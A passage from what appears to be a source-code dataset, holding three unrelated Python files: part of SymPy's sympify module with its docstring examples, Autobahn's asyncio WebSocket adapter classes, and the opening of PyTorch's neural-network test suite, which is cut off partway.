If the expression could not be converted, a SympifyError is raised.
>>> sympify("x***2")
Traceback (most recent call last):
...
SympifyError: SympifyError: "could not parse u'x***2'"
Locals
------
The sympification happens with access to everything that is loaded
by ``from sympy import *``; anything used in a string that is not
defined by that import will be converted to a symbol. In the following,
the ``bitcout`` function is treated as a symbol and the ``O`` is
interpreted as the Order object (used with series) and it raises
an error when used improperly:
>>> s = 'bitcount(42)'
>>> sympify(s)
bitcount(42)
>>> sympify("O(x)")
O(x)
>>> sympify("O + 1")
Traceback (most recent call last):
...
TypeError: unbound method...
In order to have ``bitcount`` be recognized it can be imported into a
namespace dictionary and passed as locals:
>>> from sympy.core.compatibility import exec_
>>> ns = {}
>>> exec_('from sympy.core.evalf import bitcount', ns)
>>> sympify(s, locals=ns)
6
In order to have the ``O`` interpreted as a Symbol, identify it as such
in the namespace dictionary. This can be done in a variety of ways; all
three of the following are possibilities:
>>> from sympy import Symbol
>>> ns["O"] = Symbol("O") # method 1
>>> exec_('from sympy.abc import O', ns) # method 2
>>> ns.update(dict(O=Symbol("O"))) # method 3
>>> sympify("O + 1", locals=ns)
O + 1
If you want *all* single-letter and Greek-letter variables to be symbols
then you can use the clashing-symbols dictionaries that have been defined
there as private variables: _clash1 (single-letter variables), _clash2
(the multi-letter Greek names) or _clash (both single and multi-letter
names that are defined in abc).
>>> from sympy.abc import _clash1
>>> _clash1
{'C': C, 'E': E, 'I': I, 'N': N, 'O': O, 'Q': Q, 'S': S}
>>> sympify('C & Q', _clash1)
And(C, Q)
Strict
------
If the option ``strict`` is set to ``True``, only the types for which an
explicit conversion has been defined are converted. In the other
cases, a SympifyError is raised.
>>> print(sympify(None))
None
>>> sympify(None, strict=True)
Traceback (most recent call last):
...
SympifyError: SympifyError: None
Evaluation
----------
If the option ``evaluate`` is set to ``False``, then arithmetic and
operators will be converted into their SymPy equivalents and the
``evaluate=False`` option will be added. Nested ``Add`` or ``Mul`` will
be denested first. This is done via an AST transformation that replaces
operators with their SymPy equivalents, so if an operand redefines any
of those operations, the redefined operators will not be used.
>>> sympify('2**2 / 3 + 5')
19/3
>>> sympify('2**2 / 3 + 5', evaluate=False)
2**2/3 + 5
Extending
---------
To extend ``sympify`` to convert custom objects (not derived from ``Basic``),
just define a ``_sympy_`` method to your class. You can do that even to
classes that you do not own by subclassing or adding the method at runtime.
>>> from sympy import Matrix
>>> class MyList1(object):
... def __iter__(self):
... yield 1
... yield 2
... raise StopIteration
... def __getitem__(self, i): return list(self)[i]
... def _sympy_(self): return Matrix(self)
>>> sympify(MyList1())
Matrix([
[1],
[2]])
If you do not have control over the class definition you could also use the
``converter`` global dictionary. The key is the class and the value is a
function that takes a single argument and returns the desired SymPy
object, e.g. ``converter[MyList] = lambda x: Matrix(x)``.
>>> class MyList2(object): # XXX Do not do this if you control the class!
... def __iter__(self): # Use _sympy_!
... yield 1
... yield 2
... raise StopIteration
... def __getitem__(self, i): return list(self)[i]
>>> from sympy.core.sympify import converter
>>> converter[MyList2] = lambda x: Matrix(x)
>>> sympify(MyList2())
Matrix([
[1],
[2]])
Notes
=====
Sometimes autosimplification during sympification results in expressions
that are very different in structure than what was entered. Until such
autosimplification is no longer done, the ``kernS`` function might be of
some use. In the example below you can see how an expression reduces to
-1 by autosimplification, but does not do so when ``kernS`` is used.
>>> from sympy.core.sympify import kernS
>>> from sympy.abc import x
>>> -2*(-(-x + 1/x)/(x*(x - 1/x)**2) - 1/(x*(x - 1/x))) - 1
-1
>>> s = '-2*(-(-x + 1/x)/(x*(x - 1/x)**2) - 1/(x*(x - 1/x))) - 1'
>>> sympify(s)
-1
>>> kernS(s)
-2*(-(-x + 1/x)/(x*(x - 1/x)**2) - 1/(x*(x - 1/x))) - 1
"""
try:
cls = a.__class__
except AttributeError: # a is probably an old-style class object
cls = type(a)
if cls in sympy_classes:
return a
if cls is type(None):
if strict:
raise SympifyError(a)
else:
return a
try:
return converter[cls](a)
except KeyError:
for superclass in getmro(cls):
try:
return converter[superclass](a)
except KeyError:
continue
if isinstance(a, CantSympify):
raise SympifyError(a)
try:
return a._sympy_()
except AttributeError:
pass
if not isinstance(a, string_types):
for coerce in (float, int):
try:
return sympify(coerce(a))
except (TypeError, ValueError, AttributeError, SympifyError):
continue
if strict:
raise SympifyError(a)
if iterable(a):
try:
return type(a)([sympify(x, locals=locals, convert_xor=convert_xor,
rational=rational) for x in a])
except TypeError:
# Not all iterables are rebuildable with their type.
pass
if isinstance(a, dict):
try:
return type(a)([sympify(x, locals=locals, convert_xor=convert_xor,
rational=rational) for x in a.items()])
except TypeError:
# Not all iterables are rebuildable with their type.
pass
# At this point we were given an arbitrary expression
# which does not inherit from Basic and doesn't implement
# _sympy_ (which is a canonical and robust way to convert
# anything to SymPy expression).
#
# As a last chance, we try to take "a"'s normal form via unicode()
# and try to parse it. If it fails, then we have no luck and
# return an exception
try:
from .compatibility import unicode
a = unicode(a)
except Exception as exc:
raise SympifyError(a, exc)
from sympy.parsing.sympy_parser import (parse_expr, TokenError,
standard_transformations)
from sympy.parsing.sympy_parser import convert_xor as t_convert_xor
from sympy.parsing.sympy_parser import rationalize as t_rationalize
transformations = standard_transformations
if rational:
transformations += (t_rationalize,)
if convert_xor:
transformations += (t_convert_xor,)
try:
a = a.replace('\n', '')
expr = parse_expr(a, local_dict=locals, transformations=transformations, evaluate=evaluate)
except (TokenError, SyntaxError) as exc:
raise SympifyError('could not parse %r' % a, exc)
return expr
def _sympify(a):
"""
Short version of sympify for internal usage for __add__ and __eq__ methods
where it is ok to allow some things (like Python integers and floats) in
the expression. This excludes things (like strings) that are unwise to
allow into such an expression.
>>> from sympy import Integer
>>> Integer(1) == 1
True
>>> Integer(1) == '1'
False
>>> from sympy.abc import x
>>> x + 1
x + 1
>>> x + '1'
Traceback (most recent call last):
...
TypeError: unsupported operand type(s) for +: 'Symbol' and 'str'
see: sympify
"""
return sympify(a, strict=True)
def kernS(s):
"""Use a hack to try keep autosimplification from joining Integer or
minus sign into an Add of a Mul; this modification doesn't
prevent the 2-arg Mul from becoming an Add, however.
Examples
========
>>> from sympy.core.sympify import kernS
>>> from sympy.abc import x, y, z
The 2-arg Mul allows a leading Integer to be distributed but kernS will
prevent that:
>>> 2*(x + y)
2*x + 2*y
>>> kernS('2*(x + y)')
2*(x + y)
If use of the hack fails, the un-hacked string will be passed to sympify...
and you get what you get.
XXX This hack should not be necessary once issue 1497 has been resolved.
"""
import re
from sympy.core.symbol import Symbol
hit = False
if '(' in s:
if s.count('(') != s.count(")"):
raise SympifyError('unmatched left parenthesis')
kern = '_kern'
while kern in s:
kern += "_"
olds = s
# digits*( -> digits*kern*(
s = re.sub(r'(\d+)( *\* *)\(', r'\1*%s\2(' % kern, s)
# negated parenthetical
kern2 = kern + "2"
while kern2 in s:
kern2 += "_"
# step 1: -(...) --> kern-kern*(...)
target = r'%s-%s*(' % (kern, kern)
s = re.sub(r'- *\(', target, s)
# step 2: double the matching closing parenthesis
# kern-kern*(...) --> kern-kern*(...)kern2
i = nest = 0
while True:
j = s.find(target, i)
if j == -1:
break
j = s.find('(')
for j in range(j, len(s)):
if s[j] == "(":
nest += 1
elif s[j] == ")":
nest -= 1
if nest == 0:
break
s = s[:j] + kern2 + s[j:]
i = j
# step 3: put in the parentheses
# kern-kern*(...)kern2 --> (-kern*(...))
s = s.replace(target, target.replace(kern, "(", 1))
s = s.replace(kern2, ')')
hit = kern in s
for i in range(2):
try:
expr = sympify(s)
break
except: # the kern might cause unknown errors, so use bare except
if hit:
s = olds # maybe it didn't like the kern; use un-kerned s
hit = False
continue
expr = sympify(s) # let original error raise
if not hit:
return expr
rep = {Symbol(kern): 1}
def _clear(expr):
if isinstance(expr, (list, tuple, set)):
return type(expr)([_clear(e) for e in expr])
if hasattr(expr, 'subs'):
return expr.subs(rep, hack2=True)
return expr
expr = _clear(expr)
# hope that kern is not there anymore
return expr
|
the-stack_0_19818 | ###############################################################################
#
# The MIT License (MIT)
#
# Copyright (c) Crossbar.io Technologies GmbH
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
#
###############################################################################
import asyncio
from asyncio import iscoroutine
from asyncio import Future
from collections import deque
import txaio
txaio.use_asyncio()
from autobahn.util import public
from autobahn.asyncio.util import transport_channel_id, peer2str
from autobahn.wamp import websocket
from autobahn.websocket import protocol
from autobahn.websocket.types import TransportDetails
__all__ = (
'WebSocketServerProtocol',
'WebSocketClientProtocol',
'WebSocketServerFactory',
'WebSocketClientFactory',
'WampWebSocketServerProtocol',
'WampWebSocketClientProtocol',
'WampWebSocketServerFactory',
'WampWebSocketClientFactory',
)
def yields(value):
"""
Returns ``True`` iff the value yields.
.. seealso:: http://stackoverflow.com/questions/20730248/maybedeferred-analog-with-asyncio
"""
return isinstance(value, Future) or iscoroutine(value)
class WebSocketAdapterProtocol(asyncio.Protocol):
"""
Adapter class for asyncio-based WebSocket client and server protocols.
"""
peer = None
peer_transport = None
def connection_made(self, transport):
self.transport = transport
self.receive_queue = deque()
self._consume()
# the peer we are connected to
try:
self.peer = peer2str(transport.get_extra_info('peername'))
except:
self.peer = 'process:{}'.format(self.transport.pid)
self.peer_transport = 'websocket'
self._connectionMade()
def connection_lost(self, exc):
self._connectionLost(exc)
# according to asyncio docs, connection_lost(None) is called
# if something else called transport.close()
if exc is not None:
self.transport.close()
self.transport = None
def _consume(self):
self.waiter = Future(loop=self.factory.loop or txaio.config.loop)
def process(_):
while len(self.receive_queue):
data = self.receive_queue.popleft()
if self.transport:
self._dataReceived(data)
self._consume()
self.waiter.add_done_callback(process)
def data_received(self, data):
self.receive_queue.append(data)
if not self.waiter.done():
self.waiter.set_result(None)
def _closeConnection(self, abort=False):
if abort and hasattr(self.transport, 'abort'):
self.transport.abort()
else:
self.transport.close()
def _onOpen(self):
res = self.onOpen()
if yields(res):
asyncio.ensure_future(res)
def _onMessageBegin(self, isBinary):
res = self.onMessageBegin(isBinary)
if yields(res):
asyncio.ensure_future(res)
def _onMessageFrameBegin(self, length):
res = self.onMessageFrameBegin(length)
if yields(res):
asyncio.ensure_future(res)
def _onMessageFrameData(self, payload):
res = self.onMessageFrameData(payload)
if yields(res):
asyncio.ensure_future(res)
def _onMessageFrameEnd(self):
res = self.onMessageFrameEnd()
if yields(res):
asyncio.ensure_future(res)
def _onMessageFrame(self, payload):
res = self.onMessageFrame(payload)
if yields(res):
asyncio.ensure_future(res)
def _onMessageEnd(self):
res = self.onMessageEnd()
if yields(res):
asyncio.ensure_future(res)
def _onMessage(self, payload, isBinary):
res = self.onMessage(payload, isBinary)
if yields(res):
asyncio.ensure_future(res)
def _onPing(self, payload):
res = self.onPing(payload)
if yields(res):
asyncio.ensure_future(res)
def _onPong(self, payload):
res = self.onPong(payload)
if yields(res):
asyncio.ensure_future(res)
def _onClose(self, wasClean, code, reason):
res = self.onClose(wasClean, code, reason)
if yields(res):
asyncio.ensure_future(res)
def registerProducer(self, producer, streaming):
raise Exception("not implemented")
def unregisterProducer(self):
# note that generic websocket/protocol.py code calls
# .unregisterProducer whenever we dropConnection -- that's
# correct behavior on Twisted so either we'd have to
# try/except there, or special-case Twisted, ..or just make
# this "not an error"
pass
@public
class WebSocketServerProtocol(WebSocketAdapterProtocol, protocol.WebSocketServerProtocol):
"""
Base class for asyncio-based WebSocket server protocols.
Implements:
* :class:`autobahn.websocket.interfaces.IWebSocketChannel`
"""
log = txaio.make_logger()
def get_channel_id(self, channel_id_type=None):
"""
Implements :func:`autobahn.wamp.interfaces.ITransport.get_channel_id`
"""
return transport_channel_id(self.transport, True, channel_id_type)
@public
class WebSocketClientProtocol(WebSocketAdapterProtocol, protocol.WebSocketClientProtocol):
"""
Base class for asyncio-based WebSocket client protocols.
Implements:
* :class:`autobahn.websocket.interfaces.IWebSocketChannel`
"""
log = txaio.make_logger()
def _onConnect(self, response):
res = self.onConnect(response)
if yields(res):
asyncio.ensure_future(res)
def startTLS(self):
raise Exception("WSS over explicit proxies not implemented")
def get_channel_id(self, channel_id_type=None):
"""
Implements :func:`autobahn.wamp.interfaces.ITransport.get_channel_id`
"""
return transport_channel_id(self.transport, False, channel_id_type)
def _create_transport_details(self):
"""
Internal helper.
Base class calls this to create a TransportDetails
"""
is_secure = self.transport.get_extra_info('peercert', None) is not None
if is_secure:
secure_channel_id = {
'tls-unique': transport_channel_id(self.transport, False, 'tls-unique'),
}
else:
secure_channel_id = {}
return TransportDetails(peer=self.peer, is_secure=is_secure, secure_channel_id=secure_channel_id)
class WebSocketAdapterFactory(object):
"""
Adapter class for asyncio-based WebSocket client and server factories.
"""
log = txaio.make_logger()
def __call__(self):
proto = self.protocol()
proto.factory = self
return proto
@public
class WebSocketServerFactory(WebSocketAdapterFactory, protocol.WebSocketServerFactory):
"""
Base class for asyncio-based WebSocket server factories.
Implements:
* :class:`autobahn.websocket.interfaces.IWebSocketServerChannelFactory`
"""
protocol = WebSocketServerProtocol
def __init__(self, *args, **kwargs):
"""
.. note::
In addition to all arguments to the constructor of
:meth:`autobahn.websocket.interfaces.IWebSocketServerChannelFactory`,
you can supply a ``loop`` keyword argument to specify the
asyncio event loop to be used.
"""
loop = kwargs.pop('loop', None)
self.loop = loop or asyncio.get_event_loop()
protocol.WebSocketServerFactory.__init__(self, *args, **kwargs)
@public
class WebSocketClientFactory(WebSocketAdapterFactory, protocol.WebSocketClientFactory):
"""
Base class for asyncio-based WebSocket client factories.
Implements:
* :class:`autobahn.websocket.interfaces.IWebSocketClientChannelFactory`
"""
def __init__(self, *args, **kwargs):
"""
.. note::
In addition to all arguments to the constructor of
:meth:`autobahn.websocket.interfaces.IWebSocketClientChannelFactory`,
you can supply a ``loop`` keyword argument to specify the
asyncio event loop to be used.
"""
loop = kwargs.pop('loop', None)
self.loop = loop or asyncio.get_event_loop()
protocol.WebSocketClientFactory.__init__(self, *args, **kwargs)
@public
class WampWebSocketServerProtocol(websocket.WampWebSocketServerProtocol, WebSocketServerProtocol):
"""
asyncio-based WAMP-over-WebSocket server protocol.
Implements:
* :class:`autobahn.wamp.interfaces.ITransport`
"""
@public
class WampWebSocketServerFactory(websocket.WampWebSocketServerFactory, WebSocketServerFactory):
"""
asyncio-based WAMP-over-WebSocket server factory.
"""
protocol = WampWebSocketServerProtocol
def __init__(self, factory, *args, **kwargs):
"""
:param factory: A callable that produces instances that implement
:class:`autobahn.wamp.interfaces.ITransportHandler`
:type factory: callable
:param serializers: A list of WAMP serializers to use (or ``None``
for all available serializers).
:type serializers: list of objects implementing
:class:`autobahn.wamp.interfaces.ISerializer`
"""
serializers = kwargs.pop('serializers', None)
websocket.WampWebSocketServerFactory.__init__(self, factory, serializers)
kwargs['protocols'] = self._protocols
# noinspection PyCallByClass
WebSocketServerFactory.__init__(self, *args, **kwargs)
@public
class WampWebSocketClientProtocol(websocket.WampWebSocketClientProtocol, WebSocketClientProtocol):
"""
asyncio-based WAMP-over-WebSocket client protocols.
Implements:
* :class:`autobahn.wamp.interfaces.ITransport`
"""
@public
class WampWebSocketClientFactory(websocket.WampWebSocketClientFactory, WebSocketClientFactory):
"""
asyncio-based WAMP-over-WebSocket client factory.
"""
protocol = WampWebSocketClientProtocol
def __init__(self, factory, *args, **kwargs):
"""
:param factory: A callable that produces instances that implement
:class:`autobahn.wamp.interfaces.ITransportHandler`
:type factory: callable
:param serializer: The WAMP serializer to use (or ``None`` for
"best" serializer, chosen as the first serializer available from
this list: CBOR, MessagePack, UBJSON, JSON).
:type serializer: object implementing :class:`autobahn.wamp.interfaces.ISerializer`
"""
serializers = kwargs.pop('serializers', None)
websocket.WampWebSocketClientFactory.__init__(self, factory, serializers)
kwargs['protocols'] = self._protocols
WebSocketClientFactory.__init__(self, *args, **kwargs)
|
the-stack_0_19819 |
import math
import random
import string
import unittest
import io
import unittest.mock as mock
import itertools
import warnings
import pickle
from copy import deepcopy
from itertools import repeat, product
from functools import reduce
from operator import mul
from collections import OrderedDict
import torch
# TODO: remove this global setting
# NN tests use double as the default dtype
torch.set_default_dtype(torch.double)
from torch._six import inf, nan
import torch.backends.cudnn as cudnn
import torch.nn as nn
import torch.nn.functional as F
import torch.nn.init as init
import torch.nn.utils.rnn as rnn_utils
from torch.nn.utils import clip_grad_norm_, clip_grad_value_
import torch.nn.utils.parametrize as parametrize
import torch.nn.utils.prune as prune
from torch.nn.utils import parameters_to_vector, vector_to_parameters
from torch.nn import Parameter
from torch.nn.parameter import UninitializedParameter, UninitializedBuffer
from torch.nn.parallel._functions import Broadcast
from torch.testing._internal.common_dtype import integral_types, get_all_fp_dtypes, get_all_math_dtypes
from torch.testing._internal.common_utils import freeze_rng_state, run_tests, TestCase, skipIfNoLapack, skipIfRocm, \
skipIfRocmVersionLessThan, skipIfNotMiopenSuggestNHWC, TEST_NUMPY, TEST_SCIPY, TEST_WITH_ROCM, download_file, \
get_function_arglist, load_tests, repeat_test_for_types, ALL_TENSORTYPES, \
ALL_TENSORTYPES2, suppress_warnings, TemporaryFileName, TEST_WITH_UBSAN, IS_PPC
from torch.testing._internal.common_cuda import TEST_CUDA, TEST_MULTIGPU, TEST_CUDNN, TEST_CUDNN_VERSION
from torch.testing._internal.common_nn import NNTestCase, NewModuleTest, CriterionTest, \
module_tests, criterion_tests, loss_reference_fns, \
ctcloss_reference, new_module_tests, single_batch_reference_fn
from torch.testing._internal.common_device_type import instantiate_device_type_tests, dtypes, \
dtypesIfCUDA, precisionOverride, skipCUDAIfNoCudnn, skipCUDAIfCudnnVersionLessThan, onlyCUDA, onlyCPU, \
skipCUDAIfRocm, skipCUDAIf, skipCUDAIfNotRocm, skipCUDAIfRocmVersionLessThan, skipCUDAIfNotMiopenSuggestNHWC, \
onlyOnCPUAndCUDA, deviceCountAtLeast, largeTensorTest, expectedFailureMeta, skipMeta
from torch.nn import MultiheadAttention
from hypothesis import given
import torch.testing._internal.hypothesis_utils as hu
from torch.testing._internal.common_utils import _assertGradAndGradgradChecks, gradcheck, gradgradcheck, \
GRADCHECK_NONDET_TOL
from torch.testing._internal.common_utils import dtype2prec_DONTUSE
from torch.testing._internal.common_cuda import tf32_on_and_off, tf32_is_not_fp32, tf32_off, tf32_on
from torch.types import _TensorOrTensors
AMPERE_OR_ROCM = TEST_WITH_ROCM or tf32_is_not_fp32()
# load_tests from common_utils is used to automatically filter tests for
# sharding on sandcastle. This line silences flake warnings
load_tests = load_tests
if TEST_SCIPY:
from scipy import stats
import scipy.ndimage
if TEST_NUMPY:
import numpy as np
DOUBLE_TENSORTYPES = [torch.double]
# WARNING: If you add a new top-level test case to this file, you MUST
# update test/run_test.py to list it, otherwise it will NOT be run in
# CI.
class PackedSequenceTest(TestCase):
_type_by_name = {
'torch.DoubleTensor': (torch.DoubleTensor, 'double'),
'torch.FloatTensor': (torch.FloatTensor, 'float'),
# We leave out `'torch.HalfTensor': (torch.HalfTensor, 'half'),`
# because of an error in `pad_packed_sequence`
# > AttributeError: 'torch.HalfTensor' object has no attribute 'fill_'
'torch.LongTensor': (torch.LongTensor, 'long'),
'torch.IntTensor': (torch.IntTensor, 'int'),
'torch.ShortTensor': (torch.ShortTensor, 'short'),
'torch.CharTensor': (torch.CharTensor, 'char'),
'torch.ByteTensor': (torch.ByteTensor, 'byte'),
}
def __init__(self, *args, **kwargs):
super(PackedSequenceTest, self).__init__(*args, **kwargs)
self.batch_size = 5
self.max_length = 6
def _ordered_sequence(self, tensor_type):
"""Create ordered list of random sequences"""
seqs = [tensor_type(random.randint(1, self.max_length))
for _ in range(self.batch_size)]
if tensor_type == torch.ByteTensor:
seqs = [s.random_(0, 256) for s in seqs]
else:
seqs = [s.random_(-128, 128) for s in seqs]
ordered = sorted(seqs, key=len, reverse=True)
return ordered
def _padded_sequence(self, tensor_type):
"""Create Tensor of random padded sequences"""
ordered = self._ordered_sequence(tensor_type)
lengths = [len(i) for i in ordered]
padded_tensor = rnn_utils.pad_sequence(ordered)
return padded_tensor, lengths
def test_type_casts(self):
"""Test type casting of `PackedSequence` against type casting of tensor"""
for _, (input_type, _) in self._type_by_name.items():
for expected_type_str, (_, cast_str) in self._type_by_name.items():
for enforce_sorted in [True, False]:
padded, lengths = self._padded_sequence(input_type)
packed = rnn_utils.pack_padded_sequence(
padded, lengths, enforce_sorted=enforce_sorted)
# Apply cast to `PackedSequence` instance and unpack
masked = getattr(packed, cast_str)()
unpacked, lengths_out = rnn_utils.pad_packed_sequence(masked)
self.assertEqual(unpacked.type(), expected_type_str)
def test_wrong_order(self):
a = torch.ones(25, 300)
b = torch.ones(22, 300)
b_a = rnn_utils.pad_sequence([b, a])
self.assertRaises(
RuntimeError,
lambda: rnn_utils.pack_padded_sequence(b_a, [22, 25], enforce_sorted=True))
def test_total_length(self):
padded, lengths = self._padded_sequence(torch.FloatTensor)
max_length = max(lengths)
packed = rnn_utils.pack_padded_sequence(padded, lengths)
# test ValueError if total_length < max_length
for total_length in (-1, 0, max_length - 1):
for batch_first in (True, False):
def err_fn():
rnn_utils.pad_packed_sequence(packed, batch_first=batch_first,
total_length=total_length)
self.assertRaisesRegex(ValueError,
r'Expected total_length to be at least the '
r'length of the longest sequence in input',
err_fn)
# test that pad_packed_sequence returns results of correct length
for batch_first in (True, False):
no_extra_pad, _ = rnn_utils.pad_packed_sequence(packed, batch_first=batch_first)
for total_length_delta in (0, 1, 8):
total_length = max_length + total_length_delta
unpacked, lengths_out = rnn_utils.pad_packed_sequence(packed, batch_first=batch_first,
total_length=total_length)
self.assertEqual(lengths, lengths_out)
self.assertEqual(unpacked.size(1 if batch_first else 0), total_length)
if total_length_delta == 0:
ref_output = no_extra_pad
elif batch_first:
extra_pad = no_extra_pad.new_zeros(self.batch_size, total_length_delta)
ref_output = torch.cat([no_extra_pad, extra_pad], 1)
else:
extra_pad = no_extra_pad.new_zeros(total_length_delta, self.batch_size)
ref_output = torch.cat([no_extra_pad, extra_pad], 0)
self.assertEqual(unpacked, ref_output)
def test_to(self):
for enforce_sorted in (True, False):
padded, lengths = self._padded_sequence(torch.IntTensor)
a = rnn_utils.pack_padded_sequence(
padded, lengths, enforce_sorted=enforce_sorted).cpu()
self.assertIs(a, a.to('cpu'))
self.assertIs(a, a.cpu())
self.assertIs(a, a.to('cpu', dtype=torch.int32))
self.assertEqual(a.long(), a.to(torch.int64))
if torch.cuda.is_available():
for cuda in ['cuda', 'cuda:0' if torch.cuda.device_count() == 1 else 'cuda:1']:
b = a.cuda(device=cuda)
self.assertIs(b, b.to(cuda))
self.assertIs(b, b.cuda())
self.assertEqual(a, b.to('cpu'))
self.assertEqual(b, a.to(cuda))
self.assertEqual(a, b.to('cpu', dtype=torch.int32))
self.assertIs(b, b.to(dtype=torch.int32))
self.assertEqual(b.long(), b.to(dtype=torch.int64))
def test_to_memory_format(self):
m = torch.nn.Conv2d(in_channels=16, out_channels=32, kernel_size=2, bias=True)
m = m.to(memory_format=torch.channels_last)
for param in m.parameters():
if param.dim() == 4:
self.assertTrue(param.is_contiguous(memory_format=torch.channels_last))
class TestAvgPool(TestCase):
def _sum_pool2d(self, x, kernel_size):
windows = torch.nn.functional.unfold(x, kernel_size=kernel_size, stride=kernel_size)
return torch.sum(windows, dim=1)
def _sum_pool3d(self, x, kernel_size):
# Because unfold does not support 3D sliding window we will split tensor to multiple tensors and calculate sum
h = kernel_size[0]
splited_x = [t.sum(0) for t in x.split(h) if t.size(0) == h]
# sum_pool2d assumes tensor in (1, 1, n, m) view, so unsqueeze two times
splited_x = [self._sum_pool2d(t.unsqueeze(0).unsqueeze(0), kernel_size[1:]) for t in splited_x]
joined_x = torch.cat(splited_x)
return joined_x.view(1, joined_x.numel())
def _avg_pool2d(self, x, kernel_size):
size = reduce((lambda x, y: x * y), kernel_size)
return self._sum_pool2d(x, kernel_size) / size
def _avg_pool3d(self, x, kernel_size):
size = reduce((lambda x, y: x * y), kernel_size)
return self._sum_pool3d(x, kernel_size) / size
def test_doubletensor_avg_pool2d(self):
n, m = 5, 8
input = torch.rand(1, 1, n, m)
for i in range(1, n + 1):
for j in range(1, m + 1):
actual = torch.nn.functional.avg_pool2d(input[0], (i, j))
actual = actual.view(1, actual.numel())
expected = self._avg_pool2d(input, (i, j))
self.assertEqual(actual, expected, rtol=0, atol=1e-5)
def test_avg_pool2d_with_zero_divisor(self):
self.assertRaisesRegex(RuntimeError, "divisor must be not zero",
lambda: F.avg_pool2d(torch.zeros(3, 3, 3), (2, 2), divisor_override=0))
def test_doubletensor_avg_pool2d_with_divisor(self):
n, m = 3, 3
input = torch.rand(1, 1, n, m)
for i in range(1, n + 1):
for j in range(1, m + 1):
for divisor in [1, 7, i * j]:
actual = F.avg_pool2d(input[0], (i, j), divisor_override=divisor)
actual = actual.view(1, actual.numel())
expected = self._sum_pool2d(input, (i, j)) / divisor
self.assertEqual(actual, expected, rtol=0, atol=1e-5)
def test_doubletensor_avg_pool3d(self):
h, w, d = 5, 6, 7
input = torch.rand(h, w, d)
for i in range(1, h + 1):
for j in range(1, w + 1):
for k in range(1, d + 1):
actual = torch.nn.functional.avg_pool3d(input.unsqueeze(0), (i, j, k))
actual = actual.view(1, actual.numel())
expected = self._avg_pool3d(input, (i, j, k))
self.assertEqual(actual, expected, rtol=0, atol=1e-5)
def test_doubletensor_avg_pool3d_with_divisor(self):
h, w, d = 6, 5, 7
input = torch.rand(h, w, d)
for i in range(1, h + 1):
for j in range(1, w + 1):
for k in range(1, d + 1):
for divisor in [1, 7, i * j]:
actual = torch.nn.functional.avg_pool3d(input.unsqueeze(0), (i, j, k), divisor_override=divisor)
actual = actual.view(1, actual.numel())
expected = self._sum_pool3d(input, (i, j, k)) / divisor
self.assertEqual(actual, expected, rtol=0, atol=1e-5)
def test_avg_pool3d_with_zero_divisor(self):
self.assertRaisesRegex(RuntimeError, "divisor must be not zero",
lambda: F.avg_pool3d(torch.zeros(3, 3, 3, 3), (2, 2, 2), divisor_override=0))
def test_avg_pool1d_ceil_mode(self):
# Regression test for gh-36977
x = 10 * torch.randn((1, 16, 4))
y = torch.nn.functional.avg_pool1d(
x, ceil_mode=True, count_include_pad=True, kernel_size=1, stride=2)
self.assertTrue(not torch.isnan(y).any())
if TEST_CUDA:
y = torch.nn.functional.avg_pool1d(
x.to('cuda'), ceil_mode=True, count_include_pad=True, kernel_size=1, stride=2)
self.assertTrue(not torch.isnan(y).any())
def test_avg_pool2d_ceil_mode(self):
# Regression test for gh-36977
x = 10 * torch.randn((1, 16, 4, 4))
y = torch.nn.functional.avg_pool2d(
x, ceil_mode=True, count_include_pad=True, kernel_size=(1, 2),
padding=(0, 1), stride=2)
self.assertTrue(not torch.isnan(y).any())
if TEST_CUDA:
y = torch.nn.functional.avg_pool2d(
x.to('cuda'), ceil_mode=True, count_include_pad=True, kernel_size=(1, 2),
padding=(0, 1), stride=2)
self.assertTrue(not torch.isnan(y).any())
def test_avg_pool3d_ceil_mode(self):
# Regression test for gh-36977
x = 10 * torch.randn((1, 16, 4, 4, 4))
y = torch.nn.functional.avg_pool3d(
x, ceil_mode=True, count_include_pad=True, kernel_size=(1, 2, 3), stride=2)
self.assertTrue(not torch.isnan(y).any())
if TEST_CUDA:
y = torch.nn.functional.avg_pool3d(
x.to('cuda'), ceil_mode=True, count_include_pad=True, kernel_size=(1, 2, 3), stride=2)
self.assertTrue(not torch.isnan(y).any())
class TestNN(NNTestCase):
_do_cuda_memory_leak_check = True
_do_cuda_non_default_stream = True
def _forward(self, module, input: _TensorOrTensors):
with freeze_rng_state():
if isinstance(input, tuple):
return module(*input)
else:
return module(input)
def _backward(self, module, input: _TensorOrTensors, output, grad_output, create_graph=False):
output.backward(grad_output, retain_graph=True, create_graph=create_graph)
if isinstance(input, tuple):
return tuple(i.grad.data if i.grad is not None else None for i in input)
else:
return input.grad.data if input.grad is not None else None
def _forward_criterion(self, criterion, input, target, extra_args=None):
if extra_args is None:
extra_args = tuple()
if isinstance(input, tuple):
args = input + (target,) + extra_args
output = criterion(*args)
else:
output = criterion(input, target, *extra_args)
return output
def _backward_criterion(self, criterion, input, output, target, gradOutput=None, extra_args=None):
if extra_args is None:
extra_args = tuple()
input_tuple = input if isinstance(input, tuple) else (input,)
output_tuple = output if isinstance(output, tuple) else (output,)
for i in input_tuple:
if i.grad is not None:
i.grad.data.zero_()
args = input_tuple + (target,) + extra_args
if gradOutput is None:
gradOutput = torch.ones(())
criterion(*args).backward(gradOutput.to(output_tuple[0]))
if isinstance(input, tuple):
return tuple(i.grad.data for i in input)
else:
return input.grad.data
def _zero_grad_parameters(self, module):
for p in module.parameters():
if p.grad is not None:
with torch.no_grad():
p.grad.zero_()
p.grad.detach_()
def _get_parameters(self, module):
params = []
d_params = []
for p in module.parameters():
params.append(p)
d_params.append(p.grad)
return params, d_params
def _create_basic_net(self):
class Layer(nn.Module):
def __init__(self):
super(Layer, self).__init__()
